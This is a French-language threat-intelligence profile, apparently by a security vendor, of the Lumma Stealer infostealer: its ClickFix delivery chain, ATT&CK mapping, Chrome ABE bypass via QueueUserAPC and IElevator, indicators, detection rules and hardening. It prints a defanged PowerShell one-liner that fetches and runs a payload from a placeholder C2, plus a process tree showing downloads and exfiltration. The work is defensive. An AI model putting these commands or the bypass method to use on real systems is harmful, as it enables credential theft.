# Lumma Stealer Infostealer (MaaS) · Observé pour la première fois en août 2022 ## Présentation Lumma Stealer est un infostealer ciblant Windows, exploité comme logiciel malveillant en tant que service depuis août 2022. [Microsoft suit cette famille d'opérateurs sous le nom Storm-2477.](https://www.microsoft.com/en-us/security/blog/2025/05/21/lumma-stealer-breaking-down-the-delivery-techniques-and-capabilities-of-a-prolific-infostealer/) Les affiliés louent le logiciel malveillant sur des forums cybercriminels russophones au moyen d'abonnements à plusieurs niveaux ; le code source complet serait proposé aux alentours de 20 000 $. Une fois exécuté, Lumma collecte les identifiants enregistrés dans les navigateurs, les cookies de session, les jetons d'authentification multifacteur, les données de portefeuilles de cryptomonnaies et les artefacts d'authentification locaux, puis les exfiltre vers une infrastructure contrôlée par l'attaquant. Il s'agit de l'infostealer le plus largement déployé au cours des deux dernières années. [Microsoft a identifié 394 000 hôtes Windows infectés](https://blogs.microsoft.com/on-the-issues/2025/05/21/microsoft-leads-global-action-against-favored-cybercrime-tool/) sur une période de 90 jours s'achevant en mai 2025 ; le FBI estime à 10 millions le nombre cumulé d'infections dans le monde. [Microsoft décrit Lumma comme la charge utile finale ClickFix la plus prolifique](https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/) d'après ses propres données de chasse aux menaces. L'infrastructure de Lumma a été perturbée en mai 2025 lors d'une opération coordonnée par la Digital Crimes Unit de Microsoft, le département de la Justice des États-Unis, Europol et le Cybercrime Control Center du Japon. [L'opération a perturbé environ 2 300 domaines malveillants, dont plus de 1 300 ont été saisis ou transférés à Microsoft.](https://blogs.microsoft.com/on-the-issues/2025/05/21/microsoft-leads-global-action-against-favored-cybercrime-tool/) Lumma a rétabli son infrastructure en quelques jours et reste actif. La dernière évolution documentée est une variante de distribution reposant sur Windows Terminal [divulguée par Microsoft Threat Intelligence le 5 mars 2026.](https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html) Lumma n'est pas utilisé directement pour déployer un ransomware. Il s'agit d'un outil d'acquisition d'identifiants qui alimente l'écosystème plus large des ransomwares. Les identifiants volés sont vendus à des courtiers en accès initial, puis à des opérateurs de ransomware, notamment Octo Tempest, également suivi sous le nom Scattered Spider. ### Profil de la menace Mis à jour le 5 juin 2026 | Détail | Valeur | |---|---| | Type | Infostealer (MaaS) | | Première observation | Août 2022 | | Opérateur | Storm-2477 | | En aval | Octo Tempest | | Alias | LummaC2, Lumma C2 Stealer | | Tarification | 250 à 1 000 $/mois · code source env. 20 000 $ | | Vecteurs de distribution | ClickFix · malvertising · hameçonnage · fausses mises à jour · EtherHiding | | Cibles principales | Terminaux Windows, dans le monde entier | | Acteurs de distribution | TA571 · ClearFake · Storm-1607 · Storm-0426 | | Logiciels malveillants associés | CastleLoader, IDAT Loader, Emmenhtal / PEAKLIGHT | ### Chaîne d'attaque opérationnelle · De ClickFix à Lumma 1. **Départ : Site Web malveillant** - Malvertising · leurre de logiciel piraté · hameçonnage 2. **Étape 1 : Faux CAPTCHA** - Le JavaScript détourne le presse-papiers. 3. **Étape 2 — Utilisateur : Win+R → coller → Entrée** - Processus parent : explorer / wt.exe. 4. **Étape 3 : PowerShell récupère le chargeur** - `powershell -w h … | iex` - CastleLoader · IDAT · Emmenhtal 5. **Étape 4 : Injection dans le navigateur** - `QueueUserAPC()` → chrome / edge 6. **Étape 5 : Contournement d'ABE · vol d'identifiants** - COM IElevator → Login Data · cookies · portefeuilles 7. **Impact : Vendus à des courtiers en accès initial** - Opérateurs de ransomware ClickFix constitue le principal mode de distribution. Les autres vecteurs — téléchargement direct d'un programme d'installation, faux référentiels GitHub, pièces jointes d'hameçonnage — ignorent entièrement les étapes 1 et 2. ## Tactiques, techniques et procédures Lumma correspond à plusieurs tactiques MITRE ATT&CK Enterprise, avec la plus forte densité de techniques dans les phases Exécution et Contournement des défenses. La carte de couverture ci-dessous combine les correspondances officielles du logiciel Lumma avec les comportements de distribution ClickFix observés. ### Couverture MITRE ATT&CK | Tactique | Techniques observées | |---|---| | Reconnaissance | 0 | | Dév. des ressources | 0 | | Accès initial | 2 | | Exécution | 3 | | Persistance | 2 | | Élév. de privilèges | 0 | | Contournement des défenses | 5 | | Accès aux identifiants | 2 | | Découverte | 2 | | Mouvement latéral | 0 | | Collecte | 2 | | C2 | 2 | | Exfiltration | 1 | | Impact | 0 | ### Détail des techniques | Tactique | Techniques | Action de Lumma | |---|---|---| | Accès initial | [Lien de spearphishing T1566.002](https://attack.mitre.org/techniques/T1566/002/) ; [Compromission par navigation T1189](https://attack.mitre.org/techniques/T1189/) | Des liens d'hameçonnage et des sites compromis redirigent les victimes vers de faux CAPTCHA ou des pages proposant des logiciels piratés. | | Exécution | [PowerShell T1059.001](https://attack.mitre.org/techniques/T1059/001/) ; [Fichier malveillant T1204.002](https://attack.mitre.org/techniques/T1204/002/) ; [Exécution indirecte par un binaire système T1218](https://attack.mitre.org/techniques/T1218/) | L'utilisateur colle une commande du presse-papiers dans la boîte de dialogue Exécuter ou dans Windows Terminal. PowerShell, mshta ou MSBuild l'exécute — sans exploit ni CVE. | | Persistance | [Clés Run du registre T1547.001](https://attack.mitre.org/techniques/T1547/001/) ; [Tâche planifiée T1053.005](https://attack.mitre.org/techniques/T1053/005/) | Clés Run du registre ou tâches planifiées, configurées par l'affilié. De nombreuses campagnes n'établissent pas de persistance : la première exécution suffit déjà à accomplir le vol. | | Contournement des défenses | [Fichiers obscurcis T1027](https://attack.mitre.org/techniques/T1027/) ; [Désobscurcissement/décodage T1140](https://attack.mitre.org/techniques/T1140/) ; [Contournement de sandbox T1497](https://attack.mitre.org/techniques/T1497/) ; [Chargement latéral de DLL T1574.002](https://attack.mitre.org/techniques/T1574/002/) ; [Injection APC T1055.004](https://attack.mitre.org/techniques/T1055/004/) | La charge utile du presse-papiers est complétée par des espaces. Les chargeurs détectent les machines virtuelles avant de déchiffrer, utilisent plusieurs couches d'obscurcissement et effectuent un chargement latéral via des binaires signés afin que le processus parent paraisse fiable. L'injection `QueueUserAPC()` dans chrome.exe est le mécanisme qui contourne le contrôle d'identité du processus d'ABE : l'injection n'est pas seulement une technique de contournement, elle constitue ici le prérequis de l'accès aux identifiants. | | Accès aux identifiants | [Identifiants provenant des navigateurs T1555.003](https://attack.mitre.org/techniques/T1555/003/) ; [Vol de cookie de session Web T1539](https://attack.mitre.org/techniques/T1539/) | Déchiffre les identifiants au moyen de DPAPI (préfixe de blob v10, Chrome <127) ou d'un contournement d'ABE (préfixe de blob v20, Chrome 127+). La clé de chiffrement provient de Local State. Données ciblées : Login Data, Cookies et Web Data. Vole les cookies de session avec leurs indicateurs HttpOnly/Secure intacts, ce qui contourne la MFA sans casser le second facteur. | | Découverte | [Informations système T1082](https://attack.mitre.org/techniques/T1082/) ; [Découverte de fichiers T1083](https://attack.mitre.org/techniques/T1083/) | Collecte l'identifiant matériel, la version du système d'exploitation et les logiciels installés. Ces informations servent à établir l'empreinte de la machine compromise et à en fixer le prix avant la vente de l'accès. | | Collecte | [Données du presse-papiers T1115](https://attack.mitre.org/techniques/T1115/) ; [Données du système local T1005](https://attack.mitre.org/techniques/T1005/) | Énumère plus de 80 applications et extensions de navigateur liées aux portefeuilles de cryptomonnaies, ainsi que les configurations VPN, clients de messagerie, clients FTP et données Telegram. | | Commande et contrôle | [Protocoles Web T1071.001](https://attack.mitre.org/techniques/T1071/001/) ; [DNS T1071.004](https://attack.mitre.org/techniques/T1071/004/) | POST HTTPS vers un C2 rotatif. Une variante DNS récupère des fragments de charge utile par l'intermédiaire d'enregistrements TXT. Après l'opération de démantèlement, le C2 est passé de Cloudflare à Selectel, un hébergeur russe. | | Exfiltration | [Exfiltration sur C2 T1041](https://attack.mitre.org/techniques/T1041/) | Toutes les données volées sont envoyées sur le canal C2. Le trafic est généralement inférieur à 500 Ko par hôte, en dessous de la plupart des seuils DLP. | | Reconnaissance / Dév. des ressources / Élév. de privilèges / Mouvement latéral / Impact | — | Non observé. Ces activités sont assurées par les opérateurs ou les affiliés de ransomware en aval. | ### Étape 1 : Le leurre ClickFix T1566.002 · T1204.002 · T1115 Lumma est distribué au moyen de ClickFix, une technique d'ingénierie sociale devenue la méthode d'accès initial à Windows la plus courante. [Le rapport Digital Defense Report 2025 de Microsoft attribue 47 % des attaques observées à ClickFix,](https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/) devant l'hameçonnage traditionnel. La page de leurre affiche un faux Cloudflare Turnstile, un faux Google reCAPTCHA, une invite de mise à jour du navigateur ou une erreur de visionneuse de documents. Lorsque la victime clique sur « vérifier », un JavaScript masqué écrit silencieusement une commande malveillante dans le presse-papiers. La page affiche ensuite trois instructions : `Win+R, Ctrl+V, Entrée`. Une variante de février 2026 [divulguée par Microsoft Threat Intelligence](https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html) demande d'utiliser `Win+X` puis `I` à la place, ce qui lance Windows Terminal. Cette modification contourne les règles EDR configurées pour les processus parents issus de la boîte de dialogue Exécuter. **ClickFix n'est pas le seul vecteur de distribution.** Parmi les autres méthodes actives de diffusion de Lumma figurent : le téléchargement direct d'un programme d'installation via le malvertising (l'utilisateur télécharge un MSI ou un ZIP signé, sans intervention du presse-papiers) ; de faux référentiels GitHub dotés de fichiers README générés par IA et faisant la promotion de triches de jeux ou d'outils piratés ; des pièces jointes à des e-mails d'hameçonnage (ZIP protégé par mot de passe contenant un LNK ou un MSI) ; et des leurres sur les réseaux sociaux, via YouTube et Facebook, renvoyant vers des charges utiles hébergées sur Google Sites. Ces vecteurs contournent entièrement les étapes du presse-papiers et rejoignent la chaîne d'attaque à l'étape 3 (exécution du chargeur). La couverture de détection de ces voies repose sur les étapes 3 à 5 plutôt que sur la corrélation entre presse-papiers et processus. ### Étape 2 : La charge utile du presse-papiers T1059.001 · T1027 · T1140 · T1218 La chaîne placée dans le presse-papiers est presque toujours obscurcie. Modèle représentatif observé dans des campagnes actives : ```powershell powershell -w h -c "$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm hxxp://[C2_IP]:8080/$u|iex" ``` Trois techniques sont combinées dans cette seule ligne. L'option -w h masque la fenêtre PowerShell. L'appel irm (Invoke-RestMethod) récupère une charge utile distante. Le chemin de l'URL est un créneau temporel : la commande construit une URL telle que hxxp://[C2]:8080/1746403200, où le nombre correspond à l'horodatage Unix actuel arrondi à une fenêtre de 16 secondes (l'opération -band 0xfffffffffffffff0 supprime les 4 derniers bits). Le serveur C2 ne fournit la charge utile que pendant cette fenêtre précise. Si un analyste en sécurité capture la commande et la rejoue dix minutes plus tard, le chemin de l'URL a changé et le serveur ne renvoie rien : la charge utile est éphémère et ne peut plus être récupérée ultérieurement pour analyse. Autres variantes de distribution observées dans les campagnes actuelles : - `mshta.exe` récupérant un HTA contenant du VBScript (T1218.005) - `nslookup -type=txt` récupérant des fragments de charge utile encodés en base64 dans des enregistrements DNS TXT (T1071.004) - `MSBuild.exe` appelé depuis une chaîne batch-vers-VBScript communiquant avec des terminaux RPC de blockchain pour un C2 reposant sur EtherHiding ### Étape 3 : Le chargeur T1055 · T1574.002 · T1497 · T1620 La commande du presse-papiers ne distribue pas directement Lumma. Elle distribue un chargeur. Trois chargeurs dominent les campagnes Lumma actuelles : CastleLoader (exécution en mémoire, plusieurs couches d'obscurcissement), IDAT Loader (chargement latéral de DLL via des applications légitimes signées) et Emmenhtal / PEAKLIGHT (utilisé dans le cluster ClearFake et s'appuyant sur EtherHiding pour stocker des fragments de charge utile dans des contrats intelligents Binance Smart Chain). Tous trois déchiffrent la charge utile Lumma en mémoire et n'écrivent jamais d'exécutable décompressé sur le disque. [La charge utile est injectée dans des processus de navigateur en cours d'exécution au moyen de l'API QueueUserAPC(),](https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html) en ciblant `chrome.exe` et `msedge.exe`. ### Étape 4 : Vol d'identifiants et exfiltration T1555.003 · T1539 · T1055.004 · T1115 · T1041 Lumma cible le stockage des identifiants Chromium selon deux modèles de protection, en fonction de la version de Chrome. La clé de chiffrement est stockée dans `Local State` (le fichier JSON contenant `os_crypt.encrypted_key`). Les données ciblées sont les fichiers SQLite `Login Data`, `Cookies` et `Web Data`. **DPAPI (préfixe de blob v10, Chrome <127).** Historiquement, Chrome chiffrait la clé principale au moyen de Windows DPAPI (`CryptProtectData`). DPAPI lie le déchiffrement à la session ouverte de l'utilisateur, et non à un processus précis : tout processus s'exécutant dans le même contexte utilisateur peut appeler `CryptUnprotectData` pour récupérer la clé. C'est pourquoi les infostealers classiques pouvaient simplement copier les fichiers du navigateur dans un dossier temporaire et les déchiffrer de manière externe. *Aucune injection n'est requise pour cette voie.* **Contournement du chiffrement lié à l'application (préfixe de blob v20, Chrome 127+).** Google a introduit ABE dans Chrome 127 précisément pour combler la lacune de DPAPI. ABE lie la clé principale à l'identité du processus du navigateur par l'intermédiaire du service COM `IElevator` de Chrome, qui valide l'appelant avant de libérer la clé. Tout processus autre que `chrome.exe` est refusé : c'est pourquoi l'injection est nécessaire pour les blobs v20. L'injection est le mécanisme qui contourne le contrôle d'identité du processus d'ABE. [Une fois injecté dans `chrome.exe` au moyen de `QueueUserAPC()`, le code de Lumma s'exécute dans le contexte du processus approuvé.](https://www.microsoft.com/en-us/security/blog/2025/05/21/lumma-stealer-breaking-down-the-delivery-techniques-and-capabilities-of-a-prolific-infostealer/) Il appelle ensuite l'interface COM `IElevator` de Chrome (`{708860E0-F641-4611-8895-7D867DD3675B}`). Comme l'appel provient de l'intérieur de `chrome.exe`, le contrôle d'identité du processus d'ABE est validé. L'interface renvoie la clé AES en texte clair, que Lumma utilise pour déchiffrer les cookies et mots de passe v20 des fichiers SQLite. Firefox est ciblé séparément par l'intermédiaire de `logins.json` et `key4.db`, qui utilisent le chiffrement NSS (Network Security Services), déchiffrable depuis le contexte de la session utilisateur. Les cookies du navigateur sont exportés en conservant leurs indicateurs HttpOnly et Secure. C'est ainsi que Lumma contourne la MFA : il ne casse pas le second facteur, mais vole le jeton de session post-authentification et le rejoue. [La campagne de février 2026 a également déposé Lumma dans `C:\ProgramData\app_config\ctjb` et établi une persistance au moyen d'une tâche planifiée.](https://cybersecuritynews.com/new-clickfix-attack-leverages-windows-terminal/) ### Arborescence des processus #### Aspect de la chaîne d'attaque dans la télémétrie EDR ```text explorer.exe [PID 4124] // normal user shell └─ wt.exe [PID 5612] --maximized [Anomalous parent] └─ powershell.exe [PID 7892] -w h -c "irm hxxp://[C2]:8080/$u|iex" [Malicious · T1059.001] └─ curl.exe [PID 8104] -o %TEMP%\7za.dat hxxp://... // renamed 7-Zip download └─ 7za.exe [PID 8211] x %TEMP%\payload.zip -p[pwd] └─ [signed].exe [PID 8344] → loads tampered DLL [DLL sideload · T1574.002] └─ [Lumma — memory only] [no disk artifact] chrome.exe [PID 3104] // already running — separate process tree ← QueueUserAPC() injected from PID 8344 [Cross-process injection · T1055.004] └─ IElevator::DecryptData() {708860E0-F641-4611-8895-7D867DD3675B} [ABE bypass] └─ reads Login Data · Cookies → HTTPS POST *.trycloudflare.com [T1555.003 · T1041] ``` ## Indicateurs de compromission Les indicateurs ci-dessous sont durables : chemins de fichiers, clés de registre, modèles de processus et comportements réseau qui sont restés cohérents dans les campagnes Lumma et résistent aux changements de variante. ### Chemins de fichiers Emplacements dans lesquels Lumma dépose sa charge utile, ses éléments de persistance ou ses artefacts de préparation. | Indicateur | Description | |---|---| | `C:\ProgramData\app_config\ctjb` | Lumma payload drop, Feb 2026 campaign | | `%AppData%\...\Startup\*.lnk` | Renamed 7-Zip extraction artifacts | | `%TEMP%\*.zip` | LNK shortcut persistence | | `%LocalAppData%\Temp\*.exe` | Loader staging, often deleted post-execution | ### Clés de registre Emplacements du registre que Lumma lit ou écrit, ou dans lesquels il laisse des traces. | Indicateur | Description | |---|---| | `HKCU\...\Explorer\RunMRU` | Durable forensic evidence of Run-dialog command | | `HKCU\...\CurrentVersion\Run` | Persistence when configured by affiliate | | `HKLM\...\TaskCache\Tasks` | Scheduled task persistence (Feb 2026) | ### Modèles d'arborescence des processus Chaînes d'exécution parent-enfant signalant qu'une chaîne d'attaque Lumma est en cours. | Indicateur | Description | |---|---| | `explorer.exe → powershell.exe [commande encodée]` | Classic Run-dialog ClickFix execution | | `explorer.exe → wt.exe → powershell.exe` | Windows Terminal variant, Feb 2026+ | | `[binaire signé].exe → [altérée].dll → Lumma` | DLL sideloading via IDAT/HijackLoader | | `chrome.exe ← QueueUserAPC() depuis un processus autre que le navigateur` | Browser injection, Microsoft-documented | | `[hors navigateur] → lit Login Data / logins.json` | Direct credential database read | ### Comportement réseau Modèles de trafic sortant observables au niveau du pare-feu, du proxy ou du DNS. | Indicateur | Description | |---|---| | `*.trycloudflare.com (sous-domaines aléatoires)` | Cloudflare tunneling for C2 | | `Requêtes DNS TXT · serveurs non standard` | nslookup-based payload retrieval | | `POST HTTPS vers des domaines éphémères (< 72 h)` | Exfiltration to rotating C2 | | `RPC BNB Smart Chain · processus autres que des portefeuilles` | EtherHiding payload retrieval | ## Réponse de Malware Protection Plus Une démonstration présentant la détection de la chaîne d'exécution par LOLBins, l'endiguement automatisé du terminal affecté et la capture forensique des artefacts de commande. ## Recommandations de détection La chaîne d'attaque de Lumma laisse un modèle de corrélation distinctif dès ses premières étapes. L'analyse fondée sur les signatures ne détecte pas la charge utile, car chaque build du chargeur est modifié. La détection comportementale la repère, car la chaîne combine une activité du presse-papiers, l'exécution de binaires fiables et des anomalies de processus de navigateur selon une séquence qu'aucune activité utilisateur légitime ne produit. ### 1. Corrélation entre presse-papiers et processus **Télémétrie des terminaux** Contenu du presse-papiers comprenant `powershell`, `mshta`, `iex`, `nslookup` ou des chaînes base64, suivi dans les trente secondes par l'exécution de ces mêmes binaires avec `explorer.exe` ou `wt.exe` comme processus parent. **Pourquoi cela fonctionne :** les utilisateurs légitimes collent rarement ces chaînes dans la boîte de dialogue Exécuter. La fenêtre de trente secondes corrèle le leurre avec l'exécution. ### 2. Écritures dans le registre RunMRU **Surveillance du registre** Nouvelles entrées écrites dans `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` contenant PowerShell, mshta ou une syntaxe de commande encodée. **Pourquoi cela fonctionne :** cette clé persiste après la fin du processus ; l'artefact est donc durable pour reconstituer la chronologie forensique. ### 3. Anomalies parent-enfant impliquant des LOLBins **Télémétrie EDR / des processus** Générez une alerte lorsque `powershell.exe`, `mshta.exe`, `wscript.exe`, `rundll32.exe`, `nslookup.exe` ou `MSBuild.exe` sont lancés comme enfants directs de `explorer.exe` ou `wt.exe` avec des lignes de commande encodées ou récupérant du contenu distant. **Pourquoi cela fonctionne :** dans un environnement utilisateur normal, ces binaires ne devraient jamais avoir ces processus parents avec ces arguments. ### 4. Injection dans un processus de navigateur **Télémétrie EDR / des API** Appels `QueueUserAPC()` dans `chrome.exe` ou `msedge.exe` depuis des processus parents autres que les navigateurs. Lecture de `logins.json`, `key4.db` ou du fichier SQLite Chromium Login Data par tout processus autre que le navigateur. **Pourquoi cela fonctionne :** les navigateurs lisent eux-mêmes ces fichiers ; les processus externes ne devraient jamais le faire. ### 5. Contournement d'ABE — instanciation COM IElevator **Télémétrie EDR / COM** Instanciation COM de `{708860E0-F641-4611-8895-7D867DD3675B}`, l'interface `IElevator` de Chrome, depuis un contexte de thread provenant de l'extérieur de `chrome.exe`, c'est-à-dire depuis un thread injecté. Générez une alerte lorsque tout processus autre qu'une installation Chrome légitime appelle ce CLSID. **Pourquoi cela fonctionne :** il s'agit de l'indicateur direct d'un contournement d'ABE en cours. Les appels `IElevator` légitimes proviennent du propre processus de Chrome ; un appel issu d'un thread injecté constitue une preuve sans ambiguïté d'un vol d'identifiants visant Chrome 127+. ### 6. Anomalies réseau **Journaux du pare-feu / DNS / proxy** Connexions sortantes vers des sous-domaines `*.trycloudflare.com` composés de mots aléatoires. Requêtes répétées d'enregistrements DNS TXT auprès de serveurs faisant autorité non standard. Connexions à des terminaux RPC de blockchain depuis des processus autres que des portefeuilles. **Pourquoi cela fonctionne :** chaque modèle constitue un signal à usage unique — tunnels Cloudflare pour le C2, DNS pour la distribution par étapes et RPC pour EtherHiding. ## Recommandations de durcissement Les quatre modifications de configuration ci-dessous bloquent la majorité des variantes ClickFix actuelles sans coût de licence. Aucune ne nécessite l'achat d'un nouveau produit. Les éléments sont classés selon la difficulté de déploiement : **Action rapide** = GPO ou règle unique, déployable en quelques jours. **Standard** = nécessite un déploiement initial en mode audit, réalisable en quelques semaines. ### 1. Désactiver la boîte de dialogue Exécuter de Windows pour les utilisateurs non administrateurs **Action rapide** Définissez la stratégie de groupe `NoRun` pour les comptes utilisateur qui n'ont pas besoin d'accéder à la boîte de dialogue Exécuter. Cette seule modification neutralise entièrement la variante ClickFix la plus courante. **Chemin :** Configuration utilisateur → Modèles d'administration → Menu Démarrer et barre des tâches → Supprimer le menu Exécuter du menu Démarrer. ### 2. Activer la journalisation des blocs de script PowerShell et le mode de langage contraint **Action rapide** La journalisation des blocs de script capture les commandes obscurcies avant leur exécution, révélant les charges utiles même lorsqu'elles s'auto-suppriment. Le mode de langage contraint restreint les fonctions PowerShell dont les attaquants dépendent pour l'exécution en mémoire et la réflexion. **Chemin :** Configuration ordinateur → Modèles d'administration → Composants Windows → Windows PowerShell. ### 3. Restreindre l'exécution des LOLBins au moyen d'AppLocker ou de WDAC **Standard** Bloquez ou restreignez `mshta.exe`, `wscript.exe`, `cscript.exe`, `MSBuild.exe` et `SyncAppvPublishingServer.vbs` dans les contextes non administratifs. **Chemin :** Configuration ordinateur → Paramètres Windows → Paramètres de sécurité → Stratégies de contrôle des applications. Commencez par un déploiement en mode audit. ### 4. Bloquer ou signaler Windows Terminal en tant que processus parent de PowerShell **Action rapide** La variante ClickFix de février 2026 utilise spécifiquement Windows Terminal (`wt.exe`), car celui-ci contourne les règles de détection fondées sur la boîte de dialogue Exécuter. **Chemin :** mettez en œuvre ce contrôle au moyen d'une règle EDR personnalisée ou d'AppLocker. ### 5. Vérifier que le chiffrement lié à l'application n'est pas désactivé par une stratégie **Action rapide** ABE est activé par défaut dans Chrome 127 et versions ultérieures. Les attaquants disposant de droits administrateur peuvent le désactiver au moyen d'une stratégie de groupe ou du registre, faisant revenir Chrome à une protection reposant uniquement sur DPAPI et rendant le vol d'identifiants trivial, sans injection. **Vérification :** confirmez que `HKLM\SOFTWARE\Policies\Google\Chrome\ApplicationBoundEncryptionEnabled` n'est pas défini sur `0`. Si la clé existe avec cette valeur, ABE est désactivé et les identifiants Chrome ne sont protégés contre aucun processus s'exécutant dans la session utilisateur. Générez une alerte en cas d'écriture dans cette clé. Les contrôles 1 à 4 bloquent les étapes de distribution et d'exécution. Le contrôle 5 protège l'étape de vol d'identifiants. Aucun n'élimine l'ingénierie sociale sous-jacente ; la sensibilisation des utilisateurs reste une mesure complémentaire. ## Références principales Sources sur lesquelles cette page est fondée. Dernière vérification par rapport aux rapports de Microsoft Threat Intelligence publiés jusqu'en mars 2026. - [Microsoft Threat Intelligence — Lumma Stealer : analyse des techniques et capacités de distribution](https://www.microsoft.com/en-us/security/blog/2025/05/21/lumma-stealer-breaking-down-the-delivery-techniques-and-capabilities-of-a-prolific-infostealer/) — MAI 2025 - [Blog Microsoft Security — Réfléchissez avant de Click(Fix)](https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/) — AOÛT 2025 - [Microsoft DCU — Microsoft dirige une opération mondiale contre Lumma Stealer](https://blogs.microsoft.com/on-the-issues/2025/05/21/microsoft-leads-global-action-against-favored-cybercrime-tool/) — MAI 2025 - [The Hacker News — Campagne ClickFix utilisant Windows Terminal](https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html) — MARS 2026 - [MITRE ATT&CK — Référence du cadre Enterprise](https://attack.mitre.org/) — ACTUEL